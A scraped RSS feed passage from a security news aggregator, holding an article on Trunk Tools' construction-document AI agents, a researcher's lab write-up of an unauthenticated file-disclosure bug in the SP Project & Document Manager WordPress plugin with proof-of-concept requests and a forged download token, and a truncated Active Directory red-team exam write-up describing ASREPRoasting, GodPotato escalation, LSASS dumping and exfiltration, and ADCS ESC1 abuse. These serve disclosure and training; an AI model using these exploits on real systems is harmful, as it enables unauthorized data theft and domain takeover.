href="https://i.redd.it/rg9kistn84bh1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1umwehq/gaze_facial_authentication_for_linux_sudo_lock/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Trunk Tools' stack cut document review from 60 days to 10 by ditching general-purpose models]]></title>
<description><![CDATA[Most verticals aren’t clean, well-oiled SaaS databases; the reality is ugly documents, proprietary schemas, implicit workflows, and long‑running tasks that most general-purpose models struggle with. This prompted construction project management company Trunk Tools to build a specialized, three-la...]]></description>
<link>https://tsecurity.de/de/3643726/it-nachrichten/trunk-tools-stack-cut-document-review-from-60-days-to-10-by-ditching-general-purpose-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643726/it-nachrichten/trunk-tools-stack-cut-document-review-from-60-days-to-10-by-ditching-general-purpose-models/</guid>
<pubDate>Fri, 03 Jul 2026 15:46:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Most verticals aren’t clean, well-oiled SaaS databases; the reality is ugly documents, proprietary schemas, implicit workflows, and long‑running tasks that most general-purpose models struggle with. </p><p>This prompted construction project management company Trunk Tools to build a specialized, three-layer architecture — perception, semantics, agents — based on highly-detailed data to support high-accuracy, highly-relevant industry automation.</p><p>Their purpose-built stack has shrunk review cycles from months to days, prevented costly field errors, and given autonomous agents the ability to reason over millions of pages of documentation, Trunk says. </p><p>“We really set out to take the data from dispersed systems, pre-process it, structure it, go through our ontology into a knowledge graph, and then train AI models,” said Sarah Buchner, Trunk’s founder and CEO and a former carpenter. </p><p>For builders in other verticals, Trunk’s approach could serve as a blueprint for transforming data chaos into agent‑ready, industry-specific workflows. </p><h2>Where general-purpose LLMs break down on industry data </h2><p>Foundation LLMs, while powerful, are optimized for breadth, not always depth. </p><p>“General-purpose LLMs are trained to be okay at everything, so they're weak at anything niche,” said Kriti Faujdar, a senior product manager working in AI infrastructure, agentic AI, security, and LLM platforms. For instance: Rare terms, domain-specific reasoning, the unspoken context that any practitioner “just knows.” </p><p>Web, app, and software developer Sébastien De Bollivier agreed that the biggest bottleneck is reliability on data that is “jargon-dense, abbreviation-heavy, and format-specific.” </p><p>“A GPT-4-class model can understand a French legal contract, but will fumble the specific article references practitioners need to cite,” he said. </p><p>Besides, the most valuable enterprise data never made it into pretraining anyway, Faujdar pointed out. It's sitting in internal systems and proprietary formats. “RAG helps a little,” she said. “But it's just giving better facts to a model that still can't reason properly in the domain.”</p><p>Pre-training on domain data is critical; enterprises should then fine-tune on good task examples and build their own evals. “A few thousand examples from real practitioners beats millions of scraped, noisy ones," Faujdar said. </p><p>Mixture-of-experts (MoE) can provide specialization without inference costs blowing up. Pairing RAG with fine-tuning also works well; RAG handles the factual long trail while fine-tuning fixes vocabulary and reasoning.</p><p>De Bollivier pointed to the advantage of hybrid stacks: A general-purpose model for reasoning and orchestration, a smaller fine-tuned model (or dense retrieval over a curated corpus) for domain-specific extraction. He advised: “Don't fine-tune to make the model 'smarter' about a domain, fine-tune to make it more reliable on the specific output format your workflow requires.”</p><p>The trades and construction are certainly industries seeing traction with these techniques, as are legal and healthcare, De Bollivier said. These verticals have “high stakes for errors plus standardized document formats, equaling clear domain-training ROI.”</p><p>One honest caveat worth mentioning, Faujdar said: Specialized models can often fall apart outside their domain, so they’re often not useful outside their expertise (unless they’re re-trained). </p><h2>Perception, semantics, agents: inside Trunk's three-layer stack</h2><p>In highly-specialized domains like construction, “data dumps” into large language models (LLMs) don’t cut it, said Trunk’s CTO Amrish Kapoor. This is because most transformers are probabilistic models: When given an image, they report back that it is “probably” a tree, or “probably” a child playing next to a tree. </p><p>This makes them insufficient for high‑precision symbolic interpretation. For instance, in construction documents, a 2-millimeter-wide symbol has a vastly different meaning depending on where it’s placed. </p><p>Further, constrained by context limits, probabilistic models struggle with long‑term project memory. “I don't mean a context window of a few tokens,” Kapoor said. “I'm talking about long term memory that stretches across months and years, because this is how long some of these projects are.”</p><p>Instead, Trunk’s three-layer system breaks workflows into: </p><ul><li><p>Perception (reading and extracting data from messy docs like PDFs, drawings, or scans)</p></li><li><p>A semantic/graph layer (making sense of that data and understanding their relationships).</p></li><li><p>LLMs and agents on top.</p></li></ul><p>Construction drawings are typically symbolic, Buchner said. A door isn't always labeled ‘door.’ Sometimes it's simply an arc on a wall that a trained eye learns to read based on years of practice. </p><p>“The perception layer is what teaches AI to read that language,” she said. The semantic layer then gives that information meaning; for instance, connecting the door to the drawing that details it, the spec that governs it, and the trade that installs it. This helps answer project engineers’ critical questions: Not "is there a door here?" but "does this door create a problem down the line?"</p><p>Particularly in construction, that shift matters because the cost of a problem compounds with time. “A conflict caught in design is relatively low cost to address,” Buchner said, “whereas the same problem caught in the field might cost tens of thousands of dollars.” </p><p>At a high level, the system identifies the document type and begins extracting information based on content (drawing, schedules, paragraph text). This data is then “transformed and augmented” in the platform, which triggers agentic workflows like knowledge graph relationships and end-user workflows. </p><p>For instance, an agent might review an architecture bulletin and produce a visual overlay comparing an older version and a newer version (flagging additions and removals), then generate written narratives that describe what those changes are in simple terms. This helps users understand what’s changed and coordinate with trade partners on updated pricing and change orders. </p><h2>The scale of construction’s data problem</h2><p>Construction workflows are “ripe with implicit assumptions and connections between data in its myriad of sources,” Buchner said. And the amount of unstructured data is “humanly impossible” to process or make sense of.</p><p>Buchner estimated the average high-rise building generates about 3.6 million pages of corresponding documentation. “If you print it into a stack of papers it would be as high as the building itself.” </p><p>All three layers of Trunk’s stack — perception, semantic, LLM — are trained on “very specific datasets” from customers with “explicit permissions” and auto‑labeling/IP, Kapoor explained. Customers who don’t want Trunk training on their data can opt out. </p><p>Data is deidentified and aggregated, and Trunk also collects “tons more” labeled data through other pipelines like 3D building information modeling (BIM). </p><p>Trunk says it only ships agents that achieve around 95% accuracy. The team maintains continuous evaluation pipelines based on ground truth data from customers and experts. They also employ an LLMs-as-a-judge model. </p><p>“This notion of an LLM as a judge is to score how well you're doing, both subjectively as well as objectively,” Kapoor said. Objectivity can be an easy ‘right’ or ‘not right,’ but subjectivity requires more nuance. </p><p>For instance, when creating an email or narrative or explanation, an LLM as a judge framework can create a composite score, or a numerical value that aggregates different metrics and tests a model's performance or risk.</p><p>There can be challenges, though, particularly with latency, Buchner noted; any time the reasoning capacity of underlying models increases, the risk of latency goes up, too. Trunk maintains a set of evaluation criteria to objectively measure latency whenever changes are made to underlying infrastructure, agents, and API calls. </p><p>Then, “before we release to customers, we ensure marginal changes to the end-user experience are well worth the performance enhancements,” Buchner said. </p><h2>From 60 days to 10: the measurable payoff</h2><p>Trunk’s platform powers seven AI agents purpose-built for construction, such as analyzing request for information (RFI) responses, overviewing bids, or reviewing drawings and submittals. </p><p>The submittal agent, for instance, flags missing, conflicting, or noncompliant information in product specs and RFIs. While it’s an essential step in the construction process, “it's a super annoying workflow,” Buchner said, because human reviewers have to compare documents “with a bunch of other parts of documents.” </p><p>But the agent is able to do this in seconds, and Trunk says it has reduced submittal cycles from 50 to 60 days to 10, “which has massive schedule and financial implications.” </p><p>Trunk is now at a place where these agents are communicating directly with each other, which is “quite exciting,” Buchner said. So, for example, one agent will review an architectural drawing for accuracy, then autonomously hand it over to agents handling RFIs and asking follow-up questions. </p><p>“If the drawings have problems, the RFI agent is taking over and is actively reaching out for clarification,” Buchner explained. </p><p>Trunk says its customers report savings of 20 to 40 minutes per field question. Buchner said that users in the field know better than anyone how much of a “time suck” it is to go back and forth from office trailers, dig through project documents in scattered systems or printed PDFs, reconcile discrepancies, and return to coordinate with trade partners. </p><p>Trunk says its customers report these additional outcomes:</p><ul><li><p>Average 8 minute time savings for single-document retrieval (status checks, location lookups, quantity queries).</p></li><li><p>Average 20 minute time savings for standard referencing (cross-referencing 2 to 3 spec sections to form an answer. </p></li><li><p>Average 40 minute time savings for multi-document research (listing and filtering queries, mapping relationships, analyzing RFIs and submittals across 4 to 6 documents).</p></li><li><p>Average 75 minute time savings for complex tasks (creating RFIs and other communication materials, deep cross-referencing across documents, change tracking). </p></li></ul><p>In one instance, Trunk’s drawing review agent flagged that a structural beam had been moved up 8.5 inches. However, this was not documented by the architect. If the change hadn’t been caught, the project manager would likely have had to strip out and reinstall the right size beam, Buchner said. This rework would have added $10,000 or more to the budget, and “certainly there would have been implications on the schedule.” </p><p>Buchner also pointed to other examples: an agent flagged $60,000 in exaggerated pricing with no justification from landscaping subcontractors; identified a fireplace that needed to be sealed prior to drywall installation, saving around $100,000 in labor, materials, and delays; and called out that an electric door required a panel that wasn’t included in electrical drawings. </p><h2>Learnings for other industries</h2><p>Trunk’s approach to building agents is applicable to any vertical working with high volumes of unstructured, industry-specific data. 

Builders working in specific verticals must understand the industry’s specific data challenges their end users face and build technical infrastructure that can transform unstructured data into something an “LLM can traverse and understand,” Buchner said. 

“Only then can you build the connections between data points that ultimately feed agentic workflows.”

A lot of money is being invested in foundational models, so enterprises should build modular systems that can leverage the strengths of various models as they continue to improve, Buchner advised. 

Then, “build your technical advantage where the generic models are not investing and not performing well,” she said. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Found an Unauthenticated File Disclosure Bug in a WordPress Plugin — Then Found Out I Was a Few…]]></title>
<description><![CDATA[I Found an Unauthenticated File Disclosure Bug in a WordPress Plugin — Then Found Out I Was a Few Weeks LateAuthor: Shikhali Jamalzade GitHub: alisalive LinkedIn: camalzadsDisclosure Notice: This research was conducted entirely in an isolated, locally-hosted Docker test environment running a fres...]]></description>
<link>https://tsecurity.de/de/3643713/hacking/i-found-an-unauthenticated-file-disclosure-bug-in-a-wordpress-plugin-then-found-out-i-was-a-few/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643713/hacking/i-found-an-unauthenticated-file-disclosure-bug-in-a-wordpress-plugin-then-found-out-i-was-a-few/</guid>
<pubDate>Fri, 03 Jul 2026 15:37:12 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*14BNMx6SsZgrWANopYs-DQ.png"></figure><h3>I Found an Unauthenticated File Disclosure Bug in a WordPress Plugin — Then Found Out I Was a Few Weeks Late</h3><h4><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a> <br><strong>GitHub:</strong> <a href="http://github.com/alisalive">alisalive </a><br><strong>LinkedIn:</strong> <a href="http://linkedin.com/in/camalzads">camalzads</a></h4><blockquote><strong>Disclosure Notice:</strong><em> </em>This research was conducted entirely in an isolated, locally-hosted Docker test environment running a fresh install of WordPress and the publicly available “latest-stable” release of the plugin in question, downloaded directly from the official WordPress.org plugin repository. No live, production, or third-party website was accessed, scanned, or tested at any point. All file contents shown are synthetic test data created solely for this research. This write-up is published strictly for educational purposes, after confirming the underlying issue is already publicly tracked in the National Vulnerability Database.</blockquote><h3>Background</h3><p>Most of my CVE research starts the same way: pick a plugin with a documented history of vulnerabilities, and audit its other code paths on the theory that a developer who shipped one insecure pattern is statistically likely to have shipped others. This time the target was <strong>SP Project &amp; Document Manager</strong> (slug: sp-client-document-manager), a WordPress plugin for managing client documents and project files — with a public CVE history stretching back to CVE-2014-9178 (SQL injection) and CVE-2021-24347 (arbitrary file upload).</p><p>What follows is the story of a fully independent, fully reproducible finding — and the moment, mid-writeup, I discovered someone had already reported the same root cause a few weeks earlier. I’m publishing the full technical breakdown anyway, because the methodology, the environment-building process, and the honest reconciliation with prior art are the actual point of doing this work in public.</p><h3>Scope &amp; Method</h3><p>Parameter Detail Target SP Project &amp; Document Manager v4.71 (latest-stable, WordPress.org) Environment Local, isolated Docker stack — WordPress + MySQL 5.7 Assessment Type White-box source code audit + black-box PoC validation Authorization Self-authorized, isolated local research environment — no live targets Tools grep, MySQL CLI, Firefox DevTools (Network/Console), Docker Compose</p><h3>Phase 1: Source Identification</h3><p>I pulled the plugin directly from WordPress.org and started with the pattern I always check first on any plugin: unauthenticated AJAX surface.</p><pre>unzip sp-client-document-manager.latest-stable.zip -d sp-document<br>cd sp-document/sp-client-document-manager</pre><pre>grep -rn "wp_ajax_nopriv_" . --include="*.php"</pre><p>The scan returned eleven wp_ajax_nopriv_ registrations — endpoints reachable by anyone, logged in or not:</p><pre>./ajax.php:19:  wp_ajax_nopriv_cdm_file_permissions<br>./ajax.php:22:  wp_ajax_nopriv_cdm_folder_permissions<br>./ajax.php:25:  wp_ajax_nopriv_cdm_project_dropdown<br>./ajax.php:31:  wp_ajax_nopriv_cdm_file_info<br>./ajax.php:39:  wp_ajax_nopriv_cdm_view_file<br>./ajax.php:42:  wp_ajax_nopriv_cdm_file_list<br>./ajax.php:45:  wp_ajax_nopriv_cdm_thumbnails<br>./ajax.php:52:  wp_ajax_nopriv_cdm_add_breadcrumb<br>./ajax.php:56:  wp_ajax_nopriv_cdm_community_login<br>./ajax.php:62:  wp_ajax_nopriv_cdm_community_reset_password<br>./ajax.php:65:  wp_ajax_nopriv_cdm_community_register</pre><p>Two stood out immediately given what the plugin is for: cdm_view_file and cdm_file_list. A document manager plugin with unauthenticated file-viewing endpoints is exactly the kind of contradiction worth chasing.</p><h3>Phase 2: Root Cause Analysis</h3><p>Inside classes/ajax.php, the access gate for view_file() looked like this:</p><pre>function view_file($file_id = false) {<br>    global $wpdb, $current_user, $cdm_comments, $cdm_log, $post;<br>    ...<br>    $r = $wpdb-&gt;get_results($wpdb-&gt;prepare(<br>        "SELECT * FROM " . $wpdb-&gt;prefix . "sp_cu WHERE id = %d ORDER BY date DESC",<br>        $file_id<br>    ), ARRAY_A);</pre><pre>    if (cdm_folder_permissions($r[0]['pid']) == 1<br>        or $uid == $r[0]['uid']<br>        or current_user_can('manage_options') == true<br>        or get_option('sp_cu_release_the_kraken') == 1<br>        or !wp_verify_nonce( $_REQUEST['_ckey'], 'cdm-public-download' )) {</pre><pre>        if (current_user_can('manage_options') != true &amp;&amp; get_option('sp_cu_release_the_kraken') != 1) {<br>            if (($r[0]['pid'] == 0 &amp;&amp; $uid != $r[0]['uid'])) {<br>                return 'You do not have access to this file.';<br>            }<br>        }<br>        // ... builds and returns a download link for the file<br>    }<br>}</pre><p>The last clause of the OR chain is the bug: !wp_verify_nonce($_REQUEST['_ckey'], 'cdm-public-download'). wp_verify_nonce() returns false whenever the supplied nonce is missing or invalid — which is the <em>default</em> state for any unauthenticated visitor who was never issued one. Negating that result turns "no valid nonce" into true, and because it's OR-chained with every legitimate permission check above it, a single missing parameter overrides all of them.</p><p>The only thing standing between an anonymous visitor and a file is whether that file’s pid (parent folder ID) is 0. Files sitting at the document root are still protected by a secondary ownership check. Files inside any project folder are not.</p><h3>Phase 3: Building an Isolated Test Environment</h3><p>To validate this safely and reproducibly, I built a throwaway WordPress install rather than touching any live site.</p><pre>services:<br>  db:<br>    image: mysql:5.7<br>    command: --innodb-buffer-pool-size=128M --innodb-log-file-size=32M<br>    environment:<br>      MYSQL_ROOT_PASSWORD: rootpass123<br>      MYSQL_DATABASE: wordpress<br>      MYSQL_USER: wpuser<br>      MYSQL_PASSWORD: wppass123<br>    volumes:<br>      - db_data:/var/lib/mysql</pre><pre>  wordpress:<br>    image: wordpress:latest<br>    ports:<br>      - "8080:80"<br>    environment:<br>      WORDPRESS_DB_HOST: db:3306<br>      WORDPRESS_DB_NAME: wordpress<br>      WORDPRESS_DB_USER: wpuser<br>      WORDPRESS_DB_PASSWORD: wppass123<br>    volumes:<br>      - wp_data:/var/www/html</pre><pre>volumes:<br>  db_data:<br>  wp_data:</pre><pre>docker compose up -d</pre><p>After installing WordPress, I installed the plugin via the dashboard, embedded its shortcode on a page, created a project folder (“Client Project A”), and uploaded a synthetic test file containing the string Confidential client data - test — standing in for what a real document would contain.</p><h3>Phase 4: Proof of Concept</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6Q34zvUrSTxZ7jqy2M98-Q.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZBk8HPEpG1tgtvWSwVPuiw.png"></figure><p>With a file sitting inside a project folder (File ID: #2, owner: admin, folder: Client Project A), I opened a private/incognito browser window — no cookies, no session, no prior interaction with the site — and requested:</p><pre>GET /wp-admin/admin-ajax.php?action=cdm_view_file&amp;id=2</pre><p>The response, completely unauthenticated:</p><pre>Download File<br>June 30, 2026 1:51 pm • File ID: #2</pre><pre>File Name: test2<br>File Owner: admin<br>Folder #1: Client Project A<br>File Type: txt<br>File Size: 32.00B<br>Notes: [internal note text]</pre><p>A working “Download File” link was included in the response. Clicking it, still from the same unauthenticated private session, retrieved the file in full:</p><pre>Confidential client data - test</pre><p>No login. No nonce. No interaction with the site prior to this single request. Full file metadata and full file content, for a document belonging to another user, inside a permission-scoped project folder — the exact scenario the plugin’s access control was designed to prevent.</p><p>As a control, I repeated the same request against a file sitting at the document root (pid = 0) rather than inside a project folder. That request correctly returned "You do not have access to this file." — confirming the secondary root-level ownership check works as intended, and that the vulnerability is specifically scoped to files inside project folders, which is the plugin's primary intended use case.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*eRqy36-Nd5Lxxtcet6NkrA.png"></figure><h3>A Second, Independent Code Path</h3><p>Before writing up a disclosure report, I went one step further and asked: even if view_file() is patched, is the download mechanism itself safe on its own?</p><p>The answer is no, under default configuration. download.php registers its own handler on the init hook, independent of view_file() entirely:</p><pre>add_action('init', array($cdm_download_file, 'download'), -100);</pre><pre>if ( (is_user_logged_in() &amp;&amp; get_option('sp_cu_user_require_login_download') == 1 )<br>     or (get_option('sp_cu_user_require_login_download') == '' or get_option('sp_cu_user_require_login_download') == 0 )){<br>    // ... all permission checks (folder permissions, ownership, nonce) live inside this block<br>}</pre><p>I confirmed via direct database query that sp_cu_user_require_login_download does not exist as a row in wp_options on a fresh install — meaning get_option() returns an empty string, which satisfies the second OR branch and skips every permission check inside the block entirely. This is not a misconfiguration; it's the plugin's default, untouched state.</p><p>To verify this independently of view_file(), I constructed a download token manually from raw database values, without ever calling the AJAX endpoint:</p><pre>TOKEN=$(echo -n "2|2026-06-30 13:51:34|secret-test1.txt" | base64 -w0)</pre><pre>GET /wp-admin/admin-ajax.php?cdm-download-file-id=MnwyMDI2LTA2LTMwIDEzOjUxOjM0fHNlY3JldC10ZXN0MS50eHQ=</pre><p>From a fresh private browsing session, this returned the complete file content directly as a download — confirming that download.php's authorization logic is independently bypassable, via a different hook (init, not admin-ajax action routing), a different file, and a different root cause from the view_file() issue above.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qVqQyz8lLldvfIqJAEV-Qw.png"></figure><h3>The Reality Check</h3><p>Before drafting a disclosure report, I checked the WPScan and NVD databases for this plugin — a step I’d recommend before ever writing one line of a report, and one I almost skipped in the moment of having a fully working PoC.</p><p>The plugin has roughly twenty previously disclosed vulnerabilities. One of them, filed only weeks before this research, is <strong>CVE-2026–10737</strong>: a missing capability check on view_file(), at the same line of code, enabling unauthenticated attackers to obtain file metadata and download links for arbitrary files inside project folders.</p><p>It is the same bug. I had independently arrived at the same root cause someone else had already reported.</p><p>I want to be precise about what I’m claiming and what I’m not. The view_file() finding in Phase 2–4 above overlaps directly with CVE-2026-10737 and is not a new disclosure. The download.php finding in the section above it is a separate code path, separate file, and separate trigger mechanism — whether it warrants distinct tracking is a judgment call for the people who triage vulnerability reports, not something I'm in a position to assert unilaterally. I'm documenting it transparently rather than overstating its novelty.</p><h3>Attack Chain Summary</h3><pre>[Attacker — no credentials, no prior session]<br>        │<br>        ▼<br>[1] Identify unauthenticated AJAX surface via wp_ajax_nopriv_ grep<br>        │<br>        ▼<br>[2] Locate negated-nonce OR-chain bypass in view_file() access gate<br>        │<br>        ▼<br>[3] Confirm bypass scoped to files inside project folders (pid != 0)<br>        │<br>        ▼<br>[4] Request admin-ajax.php?action=cdm_view_file&amp;id=&lt;N&gt; — unauthenticated<br>    → Full file metadata + download link returned<br>        │<br>        ▼<br>[5] Independently confirm download.php's own auth gate is bypassed<br>    by default (unset sp_cu_user_require_login_download option)<br>        │<br>        ▼<br>[6] Construct download token manually, retrieve file directly<br>    → Full file content obtained, zero authentication, two independent paths</pre><h3>What This Taught Me</h3><p>A few things, none of which I expected to learn from a vulnerability that didn’t end in a new CVE:</p><p><strong>N-day overlap is normal, not a failure.</strong> Independently rediscovering a bug someone reported weeks earlier doesn’t mean the methodology was flawed — it means the bug was findable through a reasonable, repeatable process. That’s useful signal about both the plugin and the approach.</p><p><strong>Check existing databases before writing the report, not after.</strong> I now treat a WPScan/NVD lookup as a mandatory step before disclosure drafting begins, not an afterthought once a PoC is already polished.</p><p><strong>Distinguishing “same bug” from “adjacent bug” matters, and it’s not always obvious.</strong> The view_file() and download.php issues share a vulnerability class and a plugin, but live in different files, different hooks, and different trigger conditions. Being precise about that distinction — rather than inflating either finding's novelty — is part of doing this work honestly.</p><p><strong>The environment-building and validation process is the actual skill being practiced.</strong> Standing up an isolated Docker stack, tracing a vulnerable code path from an unauthenticated entry point to confirmed impact, building two independent PoCs, and writing them up accurately — that process transfers to the next audit regardless of whether this particular plugin yields a CVE with my name attached to it.</p><h3>Final Thoughts</h3><p>I’m 16, working through CRTA, Web-RTA, and the AD-RTS path toward OSCP, and this is one of many plugin audits I’ll run this year. Most won’t end in a new CVE — and I think that’s worth saying out loud rather than only publishing the wins. This one taught me more about doing security research honestly than it would have if I’d been first.</p><p><em>If you found this useful, feel free to connect on</em> <a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a> <em>or check out my tools on</em> <a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><p><em>All testing was conducted in an isolated, locally-hosted environment using a publicly available plugin release. No live or third-party systems were accessed at any point during this research.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=8a2d5ed61556" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/i-found-an-unauthenticated-file-disclosure-bug-in-a-wordpress-plugin-then-found-out-i-was-a-few-8a2d5ed61556">I Found an Unauthenticated File Disclosure Bug in a WordPress Plugin — Then Found Out I Was a Few…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Certified AD Red Team Specialist (AD-RTS): Full Exam Write-Up]]></title>
<description><![CDATA[Author: Shikhali JamalzadeGitHub: alisalive LinkedIn: camalzads Platform: CyberWarfare Labs (CWL) Certification: AD-RTS — Active Directory Red Team Specialist Environment: TELECOM INC. — Simulated Telecom-Sector Active Directory ForestA few months back I finished the AD-RTS course material from C...]]></description>
<link>https://tsecurity.de/de/3643709/hacking/certified-ad-red-team-specialist-ad-rts-full-exam-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643709/hacking/certified-ad-red-team-specialist-ad-rts-full-exam-write-up/</guid>
<pubDate>Fri, 03 Jul 2026 15:37:06 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jTIA7B832VNBN7OzR31H_Q.png"></figure><h4>Author: <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br>GitHub: <a href="http://github.com/alisalive">alisalive </a><br>LinkedIn: <a href="http://linkedin.com/in/camalzads">camalzads </a><br>Platform: CyberWarfare Labs (CWL) <br>Certification: AD-RTS — Active Directory Red Team Specialist Environment: TELECOM INC. — Simulated Telecom-Sector Active Directory Forest</h4><p>A few months back I finished the AD-RTS course material from CyberWarfare Labs — four modules covering core Active Directory internals, Certificate Services abuse, Exchange Server exploitation, and ESXi-to-AD integration attacks. The course itself is dense, but the real test is the 30-day flag-based challenge lab that comes after it: a live, self-contained telecom environment called telecore.ad, built around a fictional company, TELECOM INC., with a Domain Controller, a SQL Server, a PKI/ADCS server, an Exchange server, an IIS-hosted internal web application, and an ESXi hypervisor sitting inside the same domain.</p><p>The exam is split into two independent adversary paths. Path 1 assumes zero credentials and zero prior access — you start with nothing but an IP range. Path 2 assumes you already have a low-privilege authenticated foothold on a public-facing web server and have to escalate from there. Both paths converge on the same underlying domain, but the entry vectors, the misconfigurations abused, and the final objectives are completely different. This write-up walks through the full methodology for both paths, exactly as I approached them, without listing the specific flag values captured along the way — the point here is the how, not the what.</p><p>Target: TELECOM INC. internal AD forest (telecore.ad) Stack: Windows Server 2022 Domain Controller, MS SQL Server (SQLEXPRESS), ADCS Certificate Authority, Exchange Server, IIS 10 / ASP.NET Web Forms, VMware ESXi with AD-joined authentication Assessment Type: Adversary emulation — unauthenticated black-box (Path 1) and authenticated foothold escalation (Path 2) Tools: nmap, dig, ldapsearch, Impacket suite (GetNPUsers, mssqlclient, wmiexec, secretsdump), hashcat, John the Ripper, GodPotato, certipy-ad, rpcclient, smbclient, pyVmomi, ysoserial.net, exchangelib, netexec</p><h3>Path 1: Unauthenticated Adversary</h3><p>The brief for Path 1 is deliberately minimal: you are handed a /24 and told to behave like a telecom-motivated APT starting from zero. No credentials, no internal knowledge, nothing but network reachability into the range.</p><h3>Mapping the DNS Infrastructure</h3><p>Every internal Windows environment leans on DNS to keep itself glued together, and that dependency is usually the first crack an attacker can pry open. A UDP sweep across port 53 on the target range revealed multiple name servers, one of which turned out to be a secondary, less-hardened DNS instance sitting outside the domain controller itself. Once I pointed my resolver configuration at that secondary server, a full PTR sweep across the subnet mapped every reverse DNS record in the environment — instantly revealing the hostnames and roles of every server in play: the domain controller, the SQL server, the certificate authority, the Exchange server, and the hypervisor, all before a single authenticated packet had been sent.</p><p>The real opening, though, came from testing whether that secondary DNS server would honor a zone transfer request. It did — both in the reverse zone and in the forward zone for telecore.ad. AXFR being enabled on an internet- or perimeter-adjacent DNS server is a classic, almost nostalgic misconfiguration, but it remains devastatingly effective: a single dig command handed over the complete internal namespace, service records, and IP-to-hostname mapping for the entire forest, again with zero authentication.</p><p>With the domain controller identified from the zone transfer, the next step was straightforward LDAP enumeration over anonymous bind — pulling the domain’s functional level, then walking the directory for every object under objectClass=user and objectClass=computer. This produces two things that matter enormously for what comes next: a clean list of real domain user accounts (filtered out from the noise of Exchange system mailboxes and health-check accounts that always clutter a mailbox-enabled AD), and a map of which machines in the domain hold interesting roles.</p><h3>From Kerberos Pre-Auth to a Foothold on SQL</h3><p>With a legitimate username list in hand, the obvious next move was to test for accounts with Kerberos pre-authentication disabled — the classic ASREPRoasting misconfiguration. Impacket’s GetNPUsers module does this cleanly: it walks the username list and, for any account with the UF_DONT_REQUIRE_PREAUTH flag set, returns a crackable AS-REP hash without ever needing to know the account’s password up front. One of the service-oriented accounts in the environment had exactly this misconfiguration, and the resulting hash fell quickly to a dictionary attack.</p><p>Cracked credentials in hand, the next question was where they were actually valid. Cross-referencing against the computer objects pulled during LDAP enumeration pointed straight at the SQL Server. Authenticating to it with Impacket’s MSSQL client confirmed the account held sysadmin-equivalent rights on the instance — enough to re-enable the xp_cmdshell extended stored procedure, which is disabled by default on modern SQL Server but, once flipped back on, gives arbitrary OS command execution in the context of the SQL service account.</p><h3>From Service Account to SYSTEM</h3><p>Command execution as the SQL service account is useful, but it’s not the finish line — the account only had ordinary service-level privileges. A privilege check revealed SeImpersonatePrivilege was enabled, which is the precondition for the entire family of “Potato” privilege escalation exploits. On a fully patched, modern Windows Server build, most of the older Potato variants (RoguePotato, JuicyPotato, PrintSpoofer) have been closed off, but GodPotato remains effective against current builds because it abuses a lower-level RPC/DCOM marshaling primitive rather than a specific, patchable service misconfiguration.</p><p>Dropping GodPotato onto the SQL box through the xp_cmdshell channel and triggering it against a reverse shell payload elevated the session cleanly from a low-privilege service account to NT AUTHORITY\SYSTEM.</p><p>With SYSTEM on the SQL server, the natural move was a credential harvest from LSASS. Rather than dropping a third-party dumping tool that’s likely to trip EDR, I used the built-in comsvcs.dll MiniDump export via rundll32 — a living-off-the-land technique that doesn’t touch disk with anything outside of what Windows already ships. The resulting dump was compressed, exfiltrated back to the attacking host over a simple HTTP upload listener, and parsed offline with pypykatz, which yielded NTLM hashes and Kerberos material for every account that had ever authenticated interactively or as a service on that box — including a domain account with a considerably more interesting set of permissions than the one I’d started with.</p><h3>Abusing ADCS: ESC1 to Domain Admin</h3><p>The newly recovered account turned out to have enrollment rights on a certificate template published by the internal PKI, and enumerating that CA with certipy-ad flagged the template as vulnerable to the ESC1 misconfiguration: the template allows the requester to supply an arbitrary Subject Alternative Name while also permitting client authentication, meaning any authenticated user with enroll rights can request a certificate asserting an identity that isn’t their own — including Domain Admin.</p><p>Before actually requesting the certificate, it’s worth noting the certifried mitigation Microsoft shipped in response to CVE-2022–26923: modern domain controllers now cross-check the SID embedded in the certificate’s security extension against the SAN identity, so simply putting an administrator’s UPN in the SAN field is no longer sufficient on its own — you also need the correct objectSid for that account, retrievable over RPC with a simple SID lookup against the domain controller. With both the UPN and the correct SID supplied in the certificate request, the CA issued a certificate that authenticated as the Domain Administrator, and that certificate could then be exchanged for the account’s NT hash directly — no interactive logon, no password reset, just a straightforward abuse of a legitimate PKI enrollment workflow.</p><p>From there it was a matter of cracking the recovered hash offline and confirming Domain Admin access against the domain controller directly, which also surfaced an interesting security group in the domain that doesn’t exist in a stock AD install: an ESX Admins group, hinting strongly at the next phase of the assessment.</p><h3>Pivoting into the Hypervisor</h3><p>ESXi hosts joined to Active Directory for centralized authentication are common in mixed enterprise environments, and telecore.ad had exactly this setup: the hypervisor trusted domain credentials, and membership in that ESX Admins group translated directly into root-equivalent access on the host. With the cracked Domain Admin credential, I authenticated to the ESXi host and used the pyVmomi SDK — VMware’s official Python bindings for the vSphere API — to programmatically enumerate every guest VM running on the hypervisor: power state, guest OS, VMware Tools status, and, critically, the 